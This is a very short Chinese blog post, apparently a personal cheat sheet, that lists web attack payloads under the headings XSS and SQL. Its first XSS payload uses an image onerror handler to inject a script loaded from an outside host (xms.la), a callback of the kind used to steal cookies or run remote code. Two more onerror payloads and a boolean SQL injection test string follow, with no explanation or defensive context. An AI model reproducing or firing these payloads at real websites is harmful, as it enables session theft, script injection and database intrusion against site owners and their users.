xss,sql

xss

<img src=test.jpg  onerror="document.body.appendChild(document.createElement('script')).src='http://www.xms.la/x.php?c=L'">
<img src=1 onerror=document.body.innerHTML="<script src=xss></script>">
<img src=1 onerror=alert(1)>

sql

1%' and 1=1 and '%'='
个人博客:cscwdxgg.github.io
微信公众号:Asz918q
原文地址:https://www.cnblogs.com/wdxgg/p/12965585.html